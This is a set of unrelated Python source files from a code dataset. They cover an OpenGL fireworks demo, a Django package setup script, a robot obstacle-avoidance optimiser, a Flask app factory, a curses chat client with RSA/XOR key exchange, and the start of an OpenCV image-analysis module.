glfw.CURSOR, glfw.CURSOR_DISABLED)\n\n glfw.make_context_current(glfwWindow)\n\n glfw.set_window_size_callback(glfwWindow, HandleWindowSizeCallback)\n\n glfw.set_key_callback(glfwWindow, HandleKeyCallback) \n \n glfw.set_cursor_pos_callback(glfwWindow, HandleCursorPosCallback)\n\n shader = Shader(vertexShaderCode, fragmentShaderCode)\n\n gSceneManager.InitializeOpenGL()\n 
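# NOTE (editorial comment, not the author's): the GLFW context was made current above; the font texture, display lists and mesh buffers created during the scene setup below require a current GL context, which is why this ordering matters.\n    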
gSceneManager.SetCamera(Camera())\n    gSceneManager.MakeFont()\n    #gSceneManager.AddObject(Firework(glm.vec3(0.0, -20.0, 0.0)))\n\n    prjMat = []\n    viewMat = []\n\n    lastElapsedTime = glfw.get_time()\n    deltaTime = 0.0\n\n    while glfw.window_should_close(glfwWindow) == False:\n        glfw.poll_events()\n\n        glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)\n\n        gSceneManager.AddObject(Firework(glm.vec3(0.0, -50.0, 0.0)))\n\n        gSceneManager.Update(deltaTime)\n\n        prjMat = gSceneManager.GetPerspectivePrjMat()\n        viewMat = gSceneManager.GetViewMat()\n\n        shader.Use()\n\n        shader.SetMat4('prjMat', prjMat)\n        shader.SetMat4('viewMat', viewMat)\n\n        gSceneManager.DrawObjects()\n\n        glUseProgram(0)\n\n        gSceneManager.DrawProgramInfo(deltaTime)\n\n        glfw.swap_buffers(glfwWindow)\n\n        deltaTime = glfw.get_time() - lastElapsedTime\n        lastElapsedTime = glfw.get_time()\n\n    glfw.terminate()\n\n\nif __name__ == \"__main__\":\n    Main()\n","repo_name":"acekcw/Application","sub_path":"Fireworks (Fireworks.P01).py","file_name":"Fireworks (Fireworks.P01).py","file_ext":"py","file_size_in_byte":42692,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"}
{"seq_id":"5761192895","text":"import os\nfrom setuptools import setup\nfrom sitemetrics import VERSION\n\n\nf = open(os.path.join(os.path.dirname(__file__), 'README.rst'))\nreadme = f.read()\nf.close()\n\nsetup(\n    name='django-sitemetrics',\n    version='.'.join(map(str, VERSION)),\n    description='Reusable application for Django providing easy means to integrate site metrics counters into your sites',\n    long_description=readme,\n    author=\"Igor 'idle sign' Starikov\",\n    author_email='idlesign@yandex.ru',\n    url='http://github.com/idlesign/django-sitemetrics',\n    packages=['sitemetrics'],\n    include_package_data=True,\n    zip_safe=False,\n    classifiers=[\n        'Development Status :: 4 - Beta',\n        'Environment :: Web Environment',\n        'Framework :: Django',\n        'Intended Audience :: Developers',\n        'License :: OSI Approved :: BSD License',\n        'Operating System :: OS Independent',\n        'Programming Language :: Python',\n        'Programming Language :: Python :: 2',\n        'Programming Language :: Python :: 2.7',\n        'Programming Language :: Python :: 3',\n        'Programming Language :: Python :: 3.3',\n    ],\n)\n","repo_name":"sarutobi/django-sitemetrics","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1129,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"43"}
{"seq_id":"24718532081","text":"#!/usr/bin/env python3\n\"\"\"\nBackend of active reference governor control law. 
Formulate CBFs.\n\nAuthor: Zhuolin Niu @ ERL\n\n\"\"\"\nimport cvxpy as cp\nimport numpy as np\n\nimport rospy\n\n\nclass RefGvnActiveGoal:\n \"\"\"\n Optimization module used for\n 1) computed CBF values of surrounding moving obstacles\n 2) formulated QCQP on constraints from CBFs and deltaE\n 3) solved QCQP for optimized local projected goal (lpg_star)\n \"\"\"\n\n def __init__(self, mo_list, gamma, kg, r_robot=0.33):\n \"\"\"\n INPUT\n mo_list list of moving obstacle information, including:\n p_mo 2d position [px, py] (m)\n v_mo linear velocity [vx, vy] (m/s)\n r_mo moving obstacle set radius\n gamma CBF class-K function parameter\n kg governor control gain\n r_robot robot circumscribed radius (default 0.33m for Jackal)\n \"\"\"\n\n self.mo_n = len(mo_list) # number of moving obstacles\n self.Ao = np.repeat(np.array([np.eye(2)]), self.mo_n, axis=0) # CBF normalization matrix\n\n self.r_mo = np.zeros((self.mo_n, 1, 1))\n self.p_mo = np.zeros((self.mo_n, 2, 1))\n self.v_mo = np.zeros((self.mo_n, 2, 1))\n\n self.gamma = gamma\n self.kg = kg\n self.r_robot = r_robot\n\n self.db_idx = [] # index list of driving backwards obstacles\n self.ho_log = np.empty(1) # safety value container\n\n self.update_movobs_info(mo_list)\n self.setup_cp_problem()\n self.qp_infeasible = False # QP status flag\n pass\n\n def update_movobs_info(self, mo_list):\n \"\"\"\n load current moving obstacle information\n \"\"\"\n self.r_mo[:, :, 0] = mo_list[:, 4:]\n self.p_mo[:, :, 0] = mo_list[:, 0:2]\n self.v_mo[:, :, 0] = mo_list[:, 2:4]\n\n self.R_mo = self.r_mo + self.r_robot\n self.Ao[:, 0:1, 0:1] = (1 / self.R_mo ** 2)\n self.Ao[:, 1:, 1:] = (1 / self.R_mo ** 2)\n return\n\n def form_cbf(self, x, g, ho_safe_limit=-0.2):\n \"\"\"\n INPUT\n x 4d robot state (2d position, 2d velocity) [zx, zy, wx, wy]\n g 2d governor state (2d position) [gx, gy]\n ho_safe_limit lowest CBF value to determine safe status as TRUE\n\n CBF equation:\n ho = (g-z)^T Ao (g-z) - (g-p)^T Ao (g-p) - 1 -2||g-p||/R_mo\n ho_dot = (partial_h/partial_g)*ug+(partial_h/partial_z)*w+(partial_h/partial_p)*v\n \"\"\"\n z, w = x[0:2], x[2:]\n\n p = self.p_mo\n v = self.v_mo\n\n d_gz = np.linalg.norm(g - z) # ||g-z||\n R_mo = self.R_mo\n gamma = self.gamma\n\n # augmented (higher dimension) arrays for matrix computation\n g_high_dim = np.repeat(np.array([np.array([g]).T]), self.mo_n, axis=0)\n z_high_dim = np.repeat(np.array([np.array([z]).T]), self.mo_n, axis=0)\n w_high_dim = np.repeat(np.array([np.array([w]).T]), self.mo_n, axis=0)\n\n # compute ho_dot values for all moving obstacles\n Ao = self.Ao\n if d_gz < 1e-3:\n bo = 0.0\n delta_gz = 0.0\n else:\n bo = 1.0 / (R_mo * d_gz)\n delta_gz = (2.0 * d_gz) / R_mo\n\n partial_d_partial_g = bo * (g_high_dim - z_high_dim)\n partial_d_partial_z = -partial_d_partial_g\n\n partial_ho_partial_g = 2 * Ao @ (g_high_dim - p) + 2 * Ao @ (z_high_dim - g_high_dim) - partial_d_partial_g\n partial_ho_partial_z = 2 * Ao @ (g_high_dim - z_high_dim) - partial_d_partial_z\n partial_ho_partial_p = -2 * Ao @ (g_high_dim - p)\n\n d_gp_sq = np.transpose(g_high_dim - p, (0, 2, 1)) @ (g_high_dim - p) # ||g-p||^2\n d_gp = np.sqrt(d_gp_sq)\n\n # compute ho values to select the least safe moving obstacle\n ho = (np.transpose(g_high_dim - p, (0, 2, 1)) @ Ao @ (g_high_dim - p)\n - np.transpose(g_high_dim - z_high_dim, (0, 2, 1)) @ Ao @ (g_high_dim - z_high_dim) - 1 - delta_gz)\n minh_ind = np.argmin(ho[:, 0, 0])\n\n # compute h_dot of the least safe moving obstacle\n # ho_dot = ho_dot_g*ug+ho_dot_f\n ho_dot_g = 
partial_ho_partial_g[minh_ind].T\n ho_dot_f = partial_ho_partial_z[minh_ind].T @ w_high_dim[minh_ind] + partial_ho_partial_p[minh_ind].T @ v[minh_ind]\n self.ho_dot_f = ho_dot_f[0, 0]\n self.ho_dot_g = ho_dot_g[0]\n\n # get CBF value from the least safe moving obstacle\n min_ho = ho[minh_ind, 0, 0]\n\n # compute classK\n self.classk_func_g = gamma * (min_ho ** 2)\n\n # get safety status\n g_safe = min_ho >= ho_safe_limit\n\n # store CBF value\n self.min_ho = min_ho\n self.ho_log = np.hstack((self.ho_log, min_ho))\n\n # update states and geometry distances of the system\n self.g = g\n self.z2d = z\n self.p = p\n self.r_gz = d_gz + self.r_robot # radius of robot-governor set\n self.d_gp = d_gp\n\n return g_safe\n\n # noinspection PyAttributeOutsideInit\n def setup_cp_problem(self):\n \"\"\"\n initially setup QCQP problem in CVXPY\n\n QCQP formulation:\n min ||lpg2d_star - lpg2d||^2\n s.t. ho_dot + classK >=0, ||lpg2d_star-g||^2<=||lpg2d-g||^2\n \n lpg2d - 2d local projected goal\n \"\"\"\n\n x = cp.Variable(2)\n P_mat = np.eye(2)\n P = cp.Parameter((2, 2), value=P_mat)\n q = cp.Parameter(2)\n l = cp.Parameter()\n A = cp.Parameter((2))\n m = cp.Parameter()\n\n objective = cp.Minimize(cp.norm(x - P @ q))\n constraints = [l <= A @ x, cp.norm(x) <= m]\n prob = cp.Problem(objective, constraints)\n\n self.x = x\n self.q = q\n self.l = l\n self.A = A\n self.m = m\n self.prob = prob\n\n return prob\n\n def update_cp_problem(self, lpg2d):\n \"\"\"\n update parameters in CVXPY problem\n \n INPUT\n lpg2d nominal 2d local projected goal computed from deltaE\n \"\"\"\n gvn2d = self.g[0:2] # 2d governor position\n ug2d = -1.0 * self.kg * (gvn2d - lpg2d) # 2d governor control input\n\n # update CVXPY parameters \n self.q.value = ug2d\n self.l.value = -self.classk_func_g - self.ho_dot_f\n self.A.value = self.ho_dot_g\n self.m.value = np.linalg.norm(ug2d)\n\n # solve QCQP\n self.prob.solve()\n ug2d_star = self.x.value\n\n # for infeasible problems, raise warning and qp_infeasible flag\n if ug2d_star is None:\n self.qp_infeasible = True\n rospy.logwarn_throttle(0.5, \"Moving obstacle avoidance Failed! 
Infeasible conditions\")\n lpg2d_star = gvn2d + ug2d / self.kg\n\n # output valid solution\n else:\n self.qp_infeasible = False\n lpg2d_star = gvn2d + ug2d_star / self.kg\n return lpg2d_star\n","repo_name":"zhl355/ERL_EAST","sub_path":"src/EAST/ref_gvn_core/src/ref_gvn_core/actlpg_optm.py","file_name":"actlpg_optm.py","file_ext":"py","file_size_in_byte":6912,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"26522029040","text":"import logging\nimport sys\nfrom flask import Flask\nfrom flask_migrate import Migrate\nfrom flask_cors import CORS\nfrom flask_jwt_extended import JWTManager\nfrom config import load_config\nfrom flask_sslify import SSLify\n\nfrom models import db\n\n\ndef create_app():\n app = Flask(__name__)\n\n # config_class = load_config(\"config.py\")\n config_class = load_config()\n\n app.config.from_object(config_class)\n\n cors = CORS(app)\n\n configure_database(app)\n\n jwt = JWTManager(app)\n\n # db.init_app(app)\n # migrate = Migrate(app, db)\n # Register blueprints\n register_blueprints(app)\n\n # Initialize flask extension objects\n # initialize_extensions(app)\n\n # Configure logging\n configure_logging(app)\n\n # Register error handlers\n register_error_handlers(app)\n\n # Enable SSL/TLS\n if app.config.get(\"ENV\") == \"PRODUCTION\":\n sslify = SSLify(app)\n\n return app\n\n\ndef configure_logging(app):\n # set up logging\n app.logger.addHandler(logging.StreamHandler(sys.stdout))\n app.logger.setLevel(logging.DEBUG)\n\n logging.basicConfig(\n level=logging.DEBUG, format=\"%(asctime)s %(levelname)s %(message)s\"\n )\n\n # Log the value of SQLALCHEMY_DATABASE_URI\n app.logger.debug(\n f\"SQLALCHEMY_DATABASE_URI: {app.config['SQLALCHEMY_DATABASE_URI']}\"\n )\n\n # We check if we are running directly or not\n if __name__ != \"__main__\":\n # if we are not running directly, we set the loggers\n gunicorn_logger = logging.getLogger(\"gunicorn.error\")\n app.logger.handlers = gunicorn_logger.handlers\n app.logger.setLevel(gunicorn_logger.level)\n\n\ndef configure_database(app):\n db.init_app(app)\n migrate = Migrate(app, db)\n with app.app_context():\n db.create_all()\n\n\ndef register_blueprints(app):\n from app.auth import auth_bp\n from app.main import main_bp\n from app.contact import contact_bp\n from app.library import library_bp\n from app.processimage import processimage_bp\n from app.recipe import recipe_bp\n from app.processurl import processurl_bp\n from app.imageupload import imageupload_bp\n\n app.register_blueprint(auth_bp, url_prefix=\"/auth\")\n app.register_blueprint(main_bp)\n app.register_blueprint(contact_bp, url_prefix=\"/api/contacts\")\n app.register_blueprint(library_bp, url_prefix=\"/api/library\")\n app.register_blueprint(processimage_bp, url_prefix=\"/api/processimage\")\n app.register_blueprint(recipe_bp, url_prefix=\"/api/recipe\")\n app.register_blueprint(processurl_bp, url_prefix=\"/api/processurl\")\n app.register_blueprint(imageupload_bp, url_prefix=\"/api/imageupload\")\n\n\ndef initialize_extensions(app):\n # mail.init_app(app)\n pass\n\n\ndef register_error_handlers(app):\n pass\n\n\ndef configure_logging(app):\n pass\n","repo_name":"ecdeise/flask_react_k8s","sub_path":"flask_api/app/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2776,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"72618616129","text":"from rsa import PublicKey, encrypt as rsa_encrypt\r\nfrom threading import 
Thread\r\nfrom random import choice\r\nfrom time import ctime\r\nimport socket\r\nimport curses\r\nimport rsa\r\n\r\ndef err_handler(function):\r\n \r\n def wrapper(*args,**kwargs):\r\n try:\r\n result = function(*args,**kwargs)\r\n return result\r\n except Exception as err:\r\n screen.addstr(0, 0, function.__name__ + ' ' + str(err.args))\r\n with open('error_log.txt','a') as err_file:\r\n err_file.write('[' + ctime() + '] ' +' in ' + function.__name__ + ' ' + str(err.args) + '\\n')\r\n\r\n return wrapper\r\n\r\n\r\nclass Server_listener(Thread):\r\n \r\n def __init__(self):\r\n Thread.__init__(self)\r\n self.stop = False\r\n\r\n \r\n @err_handler\r\n def get_data(self):\r\n try:\r\n server_data = sock.recv(1024)\r\n if not server_data:\r\n add_str('system: disconnected by server')\r\n return False\r\n except ConnectionResetError:\r\n add_str('system: disconnected by server (connection reset)')\r\n return False\r\n return xor_crypt(server_data, xor_key).decode('utf-8')\r\n #return server_data.decode('utf-8')\r\n\r\n \r\n @err_handler\r\n def send_data(self, message):\r\n try:\r\n sock.send(xor_crypt(message.encode('utf-8'), xor_key))\r\n #sock.send(message.encode('utf-8'))\r\n return True\r\n except ConnectionResetError:\r\n add_str('system: disconnected by server')\r\n return False\r\n\r\n\r\n @err_handler\r\n def run(self):\r\n global disconnected\r\n while not self.stop:\r\n server_data = self.get_data()\r\n if server_data:\r\n add_str(server_data)\r\n else:\r\n disconnected = True\r\n break\r\n\r\n\r\n@err_handler\r\ndef print_screen() -> None:\r\n string_y = 1\r\n screen.border(0)\r\n if scrolled_strings:\r\n for string in strings[-max_strings - scrolled_strings : -scrolled_strings]:\r\n if string[0]:\r\n screen.addstr(string_y, 1, string[0], user_colors.get(string[0], colors['green']))\r\n screen.addstr(string_y, 1 + len(string[0]), string[1])\r\n else:\r\n screen.addstr(string_y, 1, string[1])\r\n string_y += 1\r\n else:\r\n for string in strings[-max_strings:]:\r\n if string[0]:\r\n if '@' + nickname in string[1]:\r\n screen.addstr(string_y, 1, string[0],user_colors.get(string[0], colors['green']))\r\n screen.addstr(string_y,1 + len(string[0]), string[1], curses.color_pair(7))\r\n else:\r\n screen.addstr(string_y, 1, string[0], user_colors.get(string[0], colors['green']))\r\n screen.addstr(string_y,1 + len(string[0]), string[1],curses.color_pair(8))\r\n else:\r\n screen.addstr(string_y,1, string[1])\r\n string_y += 1\r\n screen.refresh()\r\n\r\n\r\n@err_handler\r\ndef add_str(*new_strings) -> None:\r\n splitted_strings = []\r\n for new_string in new_strings:\r\n chunks = [new_string[i:i + STR_FREE_SPACE] for i in range(0, len(new_string), STR_FREE_SPACE)]\r\n # If length of new_string is more of screen x length, divides it by chunks\r\n chunks[0] = [(chunks[0])[:chunks[0].index(':')], ((chunks[0])[chunks[0].index(':'):])]\r\n # Some magic happens in upper string!\r\n for i in range(1, len(chunks)):\r\n chunks[i] = ['', chunks[i]]\r\n chunks[-1] = [chunks[-1][0],chunks[-1][1] + ' ' * (STR_FREE_SPACE - (len(chunks[-1][1]) + len(chunks[-1][0])))]\r\n # The length of last chunk probably will be less than screen length thus fill the last length by spaces\r\n splitted_strings.extend(chunks)\r\n strings.extend(splitted_strings)\r\n print_screen()\r\n\r\n\r\n@err_handler\r\ndef parse_command(command_string: str) -> str:\r\n words = command_string.split()\r\n if words[0] == '!create':\r\n return 'CREATE ' + words[1]\r\n elif words[0] == '!connect':\r\n if len(words) > 2:\r\n return 'CONNECT 
' + words[1] + ' ' + words[2]\r\n        else:\r\n            return 'CONNECT ' + words[1] + ' '\r\n    elif words[0] == '!rooms':\r\n        return 'ROOMLIST'\r\n    elif words[0] == '!users':\r\n        return 'USERLIST'\r\n    elif words[0] == '!disconnect':\r\n        return 'DISCONNECT '\r\n    elif words[0] == '!help':\r\n        add_str('system: !create - create a room with a name',\r\n                ': !connect - connect to a room',\r\n                ': !disconnect - disconnect from the current room',\r\n                ': !rooms - see the list of public rooms',\r\n                ': !users - see the list of users in the current room',\r\n                ': !clear - clear the list of messages')\r\n    elif words[0] == '!ban':\r\n        return 'BAN ' + words[1]\r\n    elif words[0] == '!clear':\r\n        strings.clear()\r\n        for i in range(1, max_strings + 1):\r\n            screen.addstr(i, 1, ' ' * (SCREEN_X - 2))\r\n    elif words[0] == '!kick':\r\n        return 'KICK ' + words[1]\r\n    elif words[0] == '!password':\r\n        return 'PASSWORD ' + words[1]\r\n    elif words[0] == '!check':\r\n        password = get_msg('Enter secret password no one knows(check): ')\r\n        if password == 'check':\r\n            add_str('pass_checker: Right! You are so quick-witted!')\r\n        else:\r\n            add_str('pass_checker: Wrong password. Maybe you should think a little bit more')\r\n    else:\r\n        add_str('system: can not recognize \"' + words[0] + '\" command',\r\n                ': try !help to see the list of commands')\r\n\r\n\r\n@err_handler\r\ndef get_msg(welcome_msg='>>> ') -> str:\r\n    global scrolled_strings\r\n    letter_list = []\r\n    cursor_x = len(welcome_msg) + 1\r\n    # the position of the cursor after printing the welcome message; '+1' compensates for the border symbol\r\n    enter = False\r\n    msg_free_space = STR_FREE_SPACE - len(welcome_msg)\r\n    # the available space for the typed message; '-2' compensates for both the left and right borders\r\n    screen.addstr(SCREEN_Y - 2, 1, welcome_msg)\r\n    screen.refresh()\r\n    while not enter:\r\n        letter = screen.getch(SCREEN_Y - 2, cursor_x)\r\n        if letter == 10:  # Enter\r\n            if letter_list:\r\n                screen.addstr(SCREEN_Y - 2, 1, ' ' * STR_FREE_SPACE)  # clear the input area\r\n                enter = True\r\n        elif letter == 8:  # Backspace\r\n            if letter_list:\r\n                letter_x = len(welcome_msg) + 1\r\n                letter_list.pop()\r\n                screen.addstr(SCREEN_Y - 2, letter_x, ' ' * msg_free_space)\r\n                for char in letter_list[-msg_free_space:]:\r\n                    screen.addstr(SCREEN_Y - 2, letter_x, char)\r\n                    letter_x += 1\r\n                if len(letter_list) < msg_free_space - 1:\r\n                    cursor_x -= 1\r\n        elif letter == 259:  # Arrow up\r\n            if (max_strings + scrolled_strings + 1 <= len(strings)):\r\n                scrolled_strings += 1\r\n                print_screen()\r\n        elif letter == 258:  # Arrow down\r\n            if scrolled_strings - 1 >= 0:\r\n                scrolled_strings -= 1\r\n                print_screen()\r\n        elif letter == 260:  # Arrow left\r\n            pass\r\n        elif letter == 261:  # Arrow right\r\n            pass\r\n        elif letter == 27:  # Esc\r\n            sock.close()\r\n            exit()\r\n        elif letter < 32 or letter == 127:  # prevent ctrl keypresses\r\n            pass\r\n        else:  # Another char\r\n            letter_list.append(chr(letter))\r\n            letter_x = len(welcome_msg) + 1\r\n            for char in letter_list[-msg_free_space:]:\r\n                screen.addstr(SCREEN_Y - 2, letter_x, char)\r\n                letter_x += 1\r\n            if len(letter_list) < msg_free_space:\r\n                cursor_x += 1\r\n    return ''.join(letter_list)\r\n\r\n\r\n@err_handler\r\ndef pick_username() -> str:\r\n    picked = False\r\n    unique = False\r\n    nickname = ''\r\n    letter_pool = 'qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890_'\r\n    while not unique:\r\n        while not picked:\r\n            nickname = get_msg('Enter your name: ')\r\n            if len(nickname) > 3 and len(nickname) < 16:\r\n                for letter in nickname:\r\n                    if not (letter in 
letter_pool):\r\n                        add_str('system: can contain only ASCII letters or numbers')\r\n                        break\r\n                else:\r\n                    picked = True\r\n            else:\r\n                add_str('system: must be more than 3 and less than 16 letters')\r\n        server_listener.send_data(('SETNAME ' + nickname))\r\n        respond = server_listener.get_data()\r\n        if respond.split()[0] == 'ACCEPT':\r\n            unique = True\r\n            add_str('system: nickname accepted')\r\n        else:\r\n            add_str('system: \"' + nickname + '\" is occupied!')\r\n            picked = unique = False\r\n    return nickname\r\n\r\n\r\n@err_handler\r\ndef connect_to_server(host: str, port: int) -> None:\r\n    attempts = 1\r\n    while attempts <= 3:\r\n        try:\r\n            add_str('system: trying to connect(' + str(attempts) + ')...')\r\n            sock.connect((host, port))\r\n            add_str('system: connected!', 'system: try !help to see the list of commands')\r\n            break\r\n        except ConnectionError:\r\n            attempts += 1\r\n    else:\r\n        add_str('system: can not connect to server!')\r\n        decision = get_msg('retry? (yes, no): ')\r\n        if decision[0] == 'y':\r\n            connect_to_server(HOST, PORT)\r\n        elif decision[0] == 'n':\r\n            exit()\r\n\r\n\r\n@err_handler\r\ndef xor_crypt(string: bytes, key: bytes) -> bytes:\r\n    assert isinstance(string, bytes)\r\n    assert isinstance(key, bytes)\r\n    key_len = len(key)\r\n    fitted_key = bytes(key[index % key_len] for index in range(len(string)))  # fit the key to the length of a message\r\n    crypto_str = bytes([string[index] ^ fitted_key[index] for index in range(len(string))])\r\n    return crypto_str\r\n\r\n\r\nSCREEN_Y, SCREEN_X = 24, 80\r\nKEYLEN = 64\r\nSTR_FREE_SPACE = SCREEN_X - 2\r\nXOR_ALPHABET = b'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890+/'\r\nscreen = curses.initscr()\r\nscreen.resize(SCREEN_Y, SCREEN_X)\r\nscreen.keypad(True)\r\ncurses.start_color()\r\ncurses.noecho()\r\n\r\ncurses.init_pair(1, curses.COLOR_RED, curses.COLOR_BLACK)\r\ncurses.init_pair(2, curses.COLOR_BLUE, curses.COLOR_BLACK)\r\ncurses.init_pair(3, curses.COLOR_YELLOW, curses.COLOR_BLACK)\r\ncurses.init_pair(4, curses.COLOR_CYAN, curses.COLOR_BLACK)\r\ncurses.init_pair(5, curses.COLOR_MAGENTA, curses.COLOR_BLACK)\r\ncurses.init_pair(6, curses.COLOR_GREEN, curses.COLOR_BLACK)\r\ncurses.init_pair(7, curses.COLOR_BLACK, curses.COLOR_WHITE)\r\ncurses.init_pair(8, curses.COLOR_WHITE, curses.COLOR_BLACK)\r\n\r\ncolors = {\r\n    'red': curses.color_pair(1),\r\n    'blue': curses.color_pair(2),\r\n    'yellow': curses.color_pair(3),\r\n    'cyan': curses.color_pair(4),\r\n    'magenta': curses.color_pair(5),\r\n    'green': curses.color_pair(6)\r\n    }\r\n\r\nuser_colors = {\r\n    'system': colors['red'],\r\n    }\r\n\r\nmax_strings = SCREEN_Y - 3\r\nxor_key = bytes([choice(XOR_ALPHABET) for i in range(KEYLEN)])\r\nscrolled_strings = 0\r\nstrings = []\r\ndisconnected = False\r\nprog_is_alive = True\r\nHOST, PORT = '127.0.0.1', 9090\r\nnickname = ''\r\n\r\nif __name__ == '__main__':\r\n    try:\r\n        while prog_is_alive:\r\n            server_listener = Server_listener()\r\n            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n            connect_to_server(HOST, PORT)\r\n\r\n            # establishing a secure connection\r\n            tagged_server_pub = sock.recv(1024)\r\n            server_pub = PublicKey.load_pkcs1(tagged_server_pub)\r\n            xor_encrypted_key = rsa_encrypt(xor_key, server_pub)\r\n            sock.send(xor_encrypted_key)\r\n\r\n            disconnected = False\r\n            nickname = pick_username()\r\n            server_listener.start()\r\n            user_colors[nickname] = colors['blue']\r\n            while not disconnected:\r\n                message = get_msg()\r\n                if len(message) > 255:\r\n                    add_str('system: 255 symbols message limit')\r\n                    continue\r\n                if not (message.strip() in 
('','\\n','\\t','\\r')):\r\n                    if message[0] == '!':\r\n                        command = parse_command(message)\r\n                        if command:\r\n                            sent = server_listener.send_data(command)\r\n                            if not sent:\r\n                                disconnected = True\r\n                    else:\r\n                        sent = server_listener.send_data('MESSAGE ' + nickname + \": \" + message)\r\n                        if not sent:\r\n                            disconnected = True\r\n    except Exception as err:\r\n        screen.addstr(0, 0, ' ' + str(err.args))\r\n        with open('error_log.txt', 'a') as err_file:\r\n            err_file.write('[' + ctime() + '] ' + ' in __main__ ' + str(err.args) + '\\n')\r\n","repo_name":"IGORYUCH/chirper","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":13097,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"}
{"seq_id":"21948074179","text":"\"\"\"Functions for image processing\"\"\"\nimport os\nimport cv2\nimport urllib.request\nimport numpy as np\nimport base64\nimport seaborn as sns\n\nfrom matplotlib import pyplot as plt\nfrom sklearn.neighbors import KernelDensity  # used by draw_histogram below\nfrom PyAstronomy import pyaC  # zerocross1d locates zeros of the derivative\n\n\n\n\n# define the path to the face detector and smile detector\nFACE_DETECTOR_PATH = \"{base_path}/cascades/haarcascade_frontalface_default.xml\".format(\n    base_path=os.path.abspath(os.path.dirname(__file__)))\n\nSMILE_DETECTOR_PATH = \"{base_path}/cascades/haarcascade_smile.xml\".format(\n    base_path=os.path.abspath(os.path.dirname(__file__)))\n\n# path to trained faces and labels\nTRAINED_FACES_PATH = \"{base_path}/faces\".format(\n    base_path=os.path.abspath(os.path.dirname(__file__)))\n\n# maximum distance between face and match\nTHRESHOLD = 75\n\n# create the cascade classifiers\ndetector = cv2.CascadeClassifier(FACE_DETECTOR_PATH)\nsmiledetector = cv2.CascadeClassifier(SMILE_DETECTOR_PATH)\n\n\ndef _grab_image(path=None, base64_string=None, url=None):\n    # if the path is not None, then load the image from disk\n    if path is not None:\n        image = cv2.imread(path)\n    # otherwise, the image does not reside on disk\n    else:\n        # if the URL is not None, then download the image\n        if url is not None:\n            with urllib.request.urlopen(url) as resp:\n                data = resp.read()\n                image = np.asarray(bytearray(data), dtype=\"uint8\")\n                image = cv2.imdecode(image, cv2.IMREAD_COLOR)\n\n        # if the stream is not None, then the image has been uploaded\n        elif base64_string is not None:\n            # sbuf = StringIO()\n            # sbuf.write(base64.b64decode(base64_string))\n            # pimg = Image.open(sbuf)\n            # image = cv2.cvtColor(np.array(pimg), cv2.COLOR_RGB2BGR)\n\n            image = base64.b64decode(base64_string)\n            image = np.frombuffer(image, dtype=np.uint8)  # np.fromstring is deprecated\n            image = cv2.imdecode(image, 1)\n    # convert the image to a NumPy array and then read it into\n    # OpenCV format\n    # return the image\n    return image\n\n\n# laplacian\ndef get_variance_of_laplacian(image):\n    # compute the Laplacian of the image and then return the focus\n    # measure, which is simply the variance of the Laplacian\n    return cv2.Laplacian(image, cv2.CV_64F).var()\n\n\n# find contours\ndef get_conturs(img, gray_image):\n    # contours\n    edged = cv2.Canny(gray_image, 10, 300)\n    contours, hierarchy = cv2.findContours(edged,\n                                           cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)\n    # print(\"Number of Contours found = \" + str(len(contours)))\n    # Draw all contours\n    # -1 signifies drawing all contours\n    cv2.drawContours(img, contours, -1, (0, 255, 255), 1)\n    cv2.drawContours(gray_image, contours, -1, (0, 255, 255), 1)\n    # viewImage(img)\n    return int(len(contours))\n\n\n# draw lines of composition\ndef draw_lines_of_composition(img):\n    scale_percent = 100\n    width = int(img.shape[1] * scale_percent / 100)\n    height = int(img.shape[0] * 
scale_percent / 100)\n    # lines\n    cv2.line(img, (int(width / 3), 0), (int(width / 3), height), (200, 255, 255), 1)\n    cv2.line(img, (int(width * 2 / 3), 0), (int(width * 2 / 3), height), (200, 255, 255), 1)\n    cv2.line(img, (0, int(height / 3)), (int(width), int(height / 3)), (200, 255, 255), 1)\n    cv2.line(img, (0, int(height * 2 / 3)), (int(width), int(height * 2 / 3)), (200, 255, 255), 1)\n\n    cv2.circle(img, (int(width / 3), int(height / 3)), 5, (0, 255, 100), -1)\n    cv2.circle(img, (int(width * 2 / 3), int(height / 3)), 5, (0, 255, 100), -1)\n    cv2.circle(img, (int(width / 3), int(height * 2 / 3)), 5, (0, 255, 100), -1)\n    cv2.circle(img, (int(width * 2 / 3), int(height * 2 / 3)), 5, (0, 255, 100), -1)\n\n    cv2.line(img, (int(width / 3), int(height / 3)), (int(width / 3), int(height * 2 / 3)), (0, 255, 100), 2)\n    cv2.line(img, (int(width / 3), int(height / 3)), (int(width * 2 / 3), int(height / 3)), (0, 255, 100), 2)\n    cv2.line(img, (int(width / 3), int(height * 2 / 3)), (int(width * 2 / 3), int(height * 2 / 3)), (0, 255, 100), 2)\n    cv2.line(img, (int(width * 2 / 3), int(height / 3)), (int(width * 2 / 3), int(height * 2 / 3)), (0, 255, 100), 2)\n\n    wh = int(width / 6)\n    cv2.circle(img, (int(width / 3), int(height / 3)), wh, (0, 255, 100), 1)\n    cv2.circle(img, (int(width * 2 / 3), int(height / 3)), wh, (0, 255, 100), 1)\n    cv2.circle(img, (int(width / 3), int(height * 2 / 3)), wh, (0, 255, 100), 1)\n    cv2.circle(img, (int(width * 2 / 3), int(height * 2 / 3)), wh, (0, 255, 100), 1)\n\n\n# print blur/focus level\ndef print_blur_image(img, iMax):\n    a = list(range(iMax))  # a list per grid row\n    for iW in range(0, iMax, 1):\n        a[iW] = list(range(iMax))\n        scale_percent = 100\n        width = int(img.shape[1] * scale_percent / 100)\n        height = int(img.shape[0] * scale_percent / 100)\n        for iH in range(0, iMax, 1):\n            crop_img = img[int(height * iH / iMax):int(height * (iH + 1) / iMax),\n                           int(width * iW / iMax):int(width * (iW + 1) / iMax)]\n            icrop = cv2.cvtColor(crop_img, 